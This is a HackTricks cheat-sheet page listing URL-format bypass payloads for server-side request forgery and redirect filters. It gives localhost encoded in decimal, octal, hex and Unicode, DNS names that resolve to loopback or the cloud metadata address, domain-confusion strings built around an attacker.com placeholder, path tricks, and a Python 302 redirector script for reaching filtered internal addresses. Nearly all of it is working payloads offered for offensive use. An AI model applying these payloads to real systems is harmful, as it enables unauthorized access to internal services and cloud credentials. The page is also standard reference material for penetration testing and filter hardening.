HackTricks Press
Search K

Appearance

URL Format Bypass โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Try Hard Security Group

โ›“๏ธ External Link
https://discord.gg/tryhardsecurity

Localhost โ€‹

bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://โ‘ โ‘กโ‘ฆ.โ“ช.โ“ช.โ“ช

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127ใ€‚0ใ€‚0ใ€‚1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1

The Burp extension Burp-Encode-IP implements IP formatting bypasses.

Domain Parser โ€‹

bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attackerใ€‚com
โ’ถโ“‰โ“‰โ’ถโ’ธโ“€โ’บโ“ก.โ’ธโ“žโ“œ
โ‘  โ‘ก โ‘ข โ‘ฃ โ‘ค โ‘ฅ โ‘ฆ โ‘ง โ‘จ โ‘ฉ โ‘ช โ‘ซ โ‘ฌ โ‘ญ โ‘ฎ โ‘ฏ โ‘ฐ โ‘ฑ โ‘ฒ โ‘ณ โ‘ด โ‘ต โ‘ถ โ‘ท โ‘ธ โ‘น โ‘บ โ‘ป โ‘ผ โ‘ฝ โ‘พ
โ‘ฟ โ’€ โ’ โ’‚ โ’ƒ โ’„ โ’… โ’† โ’‡ โ’ˆ โ’‰ โ’Š โ’‹ โ’Œ โ’ โ’Ž โ’ โ’ โ’‘ โ’’ โ’“ โ’” โ’• โ’– โ’—
โ’˜ โ’™ โ’š โ’› โ’œ โ’ โ’ž โ’Ÿ โ’  โ’ก โ’ข โ’ฃ โ’ค โ’ฅ โ’ฆ โ’ง โ’จ โ’ฉ โ’ช โ’ซ โ’ฌ โ’ญ โ’ฎ โ’ฏ โ’ฐ
โ’ฑ โ’ฒ โ’ณ โ’ด โ’ต โ’ถ โ’ท โ’ธ โ’น โ’บ โ’ป โ’ผ โ’ฝ โ’พ โ’ฟ โ“€ โ“ โ“‚ โ“ƒ โ“„ โ“… โ“† โ“‡ โ“ˆ โ“‰
โ“Š โ“‹ โ“Œ โ“ โ“Ž โ“ โ“ โ“‘ โ“’ โ““ โ“” โ“• โ“– โ“— โ“˜ โ“™ โ“š โ“› โ“œ โ“ โ“ž โ“Ÿ โ“  โ“ก โ“ข
โ“ฃ โ“ค โ“ฅ โ“ฆ โ“ง โ“จ โ“ฉ โ“ช โ“ซ โ“ฌ โ“ญ โ“ฎ โ“ฏ โ“ฐ โ“ฑ โ“ฒ โ“ณ โ“ด โ“ต โ“ถ โ“ท โ“ธ โ“น โ“บ โ“ป โ“ผ โ“ฝ โ“พ โ“ฟ

Domain Confusion โ€‹

bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com

Paths and Extensions Bypass โ€‹

If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:

https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path

Fuzzing โ€‹

The tool recollapse can generate variations from a given input to try to bypass the used regex. Check this post also for more information.

Bypass via redirect โ€‹

It might be possible that the server is filtering the original request of a SSRF but not a possible redirect response to that request.
For example, a server vulnerable to SSRF via: url=https://www.google.com/ might be filtering the url param. But if you uses a python server to respond with a 302 to the place where you want to redirect, you might be able to access filtered IP addresses like 127.0.0.1 or even filtered protocols like gopher.
Check out this report.

python
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Explained Tricks โ€‹

Blackslash-trick โ€‹

The backslash-trick exploits a difference between the WHATWG URL Standard and RFC3986. While RFC3986 is a general framework for URIs, WHATWG is specific to web URLs and is adopted by modern browsers. The key distinction lies in the WHATWG standard's recognition of the backslash (\) as equivalent to the forward slash (/), impacting how URLs are parsed, specifically marking the transition from the hostname to the path in a URL.

https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg

Other Confusions โ€‹

https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/

image from https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/

References โ€‹

Try Hard Security Group

โ›“๏ธ External Link
https://discord.gg/tryhardsecurity
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: